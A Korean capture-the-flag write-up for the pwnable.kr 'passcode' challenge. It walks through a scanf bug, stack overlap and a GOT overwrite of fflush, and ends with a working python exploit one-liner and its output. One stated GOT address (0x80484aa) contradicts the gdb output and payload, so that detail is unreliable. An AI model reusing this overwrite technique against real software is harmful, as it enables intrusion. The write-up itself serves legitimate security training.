Toddler(passcode)
문제
Mommy told me to make a passcode based login system. My initial C code was compiled without any error! Well, there was some compiler warning, but who cares about that?
ssh passcode@pwnable.kr -p2222 (pw:guest)
풀이
서버에 접속하여 ls 명령을 입력해보면 passcode, passcode.c, flag 3개의 파일이 존재하는 것을 알 수 있습니다. cat 명령어를 통해 passcode.c 파일을 확인합니다.
#include <stdio.h>
#include <stdlib.h>
void login(){
int passcode1;
int passcode2;
printf("enter passcode1 : ");
scanf("%d", passcode1);
fflush(stdin);
printf("enter passcode2 : ");
scanf("%d", passcode2);
printf("checking...\n");
if(passcode1==338150 && passcode2==13371337){
printf("Login OK!\n");
system("/bin/cat flag");
}
else{
printf("Login Failed!\n");
exit(0);
}
}
void welcome(){
char name[100];
printf("enter you name : ");
scanf("%100s", name);
printf("Welcome %s!\n", name);
}
int main(){
printf("Toddler's Secure Login System 1.0 beta.\n");
welcome();
login();
// something after login...
printf("Now I can safely trust you that you have credential :)\n");
return 0;
}main함수에서 welcome() → login() 순으로 실행됩니다. welcome() 함수에서 100byte를 입력 받고 그 값을 출력합니다. login() 함수에는 2개의 입력을 받아 출력하는데 scanf() 함수에 & 연산자가 누락된 것을 알 수 있습니다. &연산자가 없으면 scanf함수는 받은 인자를 주소로 인식합니다. 이를 이용하여 변수 값을 주소 삼아 쓰는 것이 가능합니다. 그리고 fflush(stdin) 명령을 통해 입력 버퍼를 비웁니다. 여기서 우리가 주목해야 할 코드는 다음과 같습니다.
printf("enter passcode1 : ");
scanf("%d", passcode1);
fflush(stdin);
printf("enter passcode2 : ");
scanf("%d", passcode2);이 둘의 입력 값을 passcode라는 변수에 저장하는 것이 아닌 passcode 를 주소로 하는 곳에 저장을 하게 됩니다. 예를 들어 passcode가 0x12341234 라면 0x12341234에 우리가 입력한 값이 저장되는 것입니다. 두 변수 모두 초기화 되지 않았으므로 더미 값이 들어가 있을 것이고 그 더미 값을 주소로 하는 곳에 입력 값을 저장하게 되기 때문에 오류가 발생합니다.
gdb를 이용하여 바이너리를 분석해봅시다.
0x0804862f <+38>: lea edx,[ebp-0x70]
0x08048632 <+41>: mov DWORD PTR [esp+0x4],edx
0x08048636 <+45>: mov DWORD PTR [esp],eax
0x08048639 <+48>: call 0x80484a0 <__isoc99_scanf@plt>welcome() 함수에서 ebp-0x70에 입력 값을 저장합니다.
0x0804857c <+24>: mov edx,DWORD PTR [ebp-0x10]
0x0804857f <+27>: mov DWORD PTR [esp+0x4],edx
0x08048583 <+31>: mov DWORD PTR [esp],eax
0x08048586 <+34>: call 0x80484a0 <__isoc99_scanf@plt>epb-0x10이 passcode1 의 위치임을 알 수 있습니다. welcome()함수에서 100byte 만큼의 입력을 받는데 [ebp-0x70] - [ebp-0x10] = 0x60 = 96byte이므로 passcode1의 값에 대한 조작이 가능합니다. 그리고 passcode의 값을 주소로 하는 곳에 원하는 아무 값을 넣을 수 있으므로 원하는 주소에 원하는 값을 넣을 수 있게 됩니다. 이제 fflush(stdin)을 우회 해야 합니다. 조작할 수 있는 4byte를 사용하여 fflush의 got 를 login의 system 함수로 바꾸면 system("/bin/cat/flag") 가 실행될 것입니다.
(gdb) i func
All defined functions:
Non-debugging symbols:
0x080483e0 _init
0x08048420 printf@plt
0x08048430 fflush@plt
0x08048440 __stack_chk_fail@plt
0x08048450 puts@plt
0x08048460 system@plt
0x08048470 __gmon_start__@plt
0x08048480 exit@plt
0x08048490 __libc_start_main@plt
0x080484a0 __isoc99_scanf@plt
0x080484b0 _start
0x080484e0 __do_global_dtors_aux
0x08048540 frame_dummy
0x08048564 login
0x08048609 welcome
0x08048665 main
0x080486a0 __libc_csu_init
0x08048710 __libc_csu_fini
0x08048712 __i686.get_pc_thunk.bx
0x08048720 __do_global_ctors_aux
0x0804874c _fini
(gdb) x/i 0x8048430
0x8048430 <fflush@plt>: jmp DWORD PTR ds:0x804a004
(gdb)fflush의 got 주소는 0x80484aa 입니다.
0x080485de <+122>: call 0x8048450 <puts@plt>
0x080485e3 <+127>: mov DWORD PTR [esp],0x80487af
0x080485ea <+134>: call 0x8048460 <system@plt>login함수에서 system함수의 시작 부분은 0x80485e3입니다. 이를 이용하여 공격 코드를 작성하면 아래와 같습니다.
passcode@ubuntu:~$ (python -c 'print "A" * 96 + "\x04\xa0\x04\x08" + "134514147"';cat) | ./passcode
Toddler's Secure Login System 1.0 beta.
enter you name : Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA!
Sorry mom.. I got confused about scanf usage :(
enter passcode1 : Now I can safely trust you that you have credential :)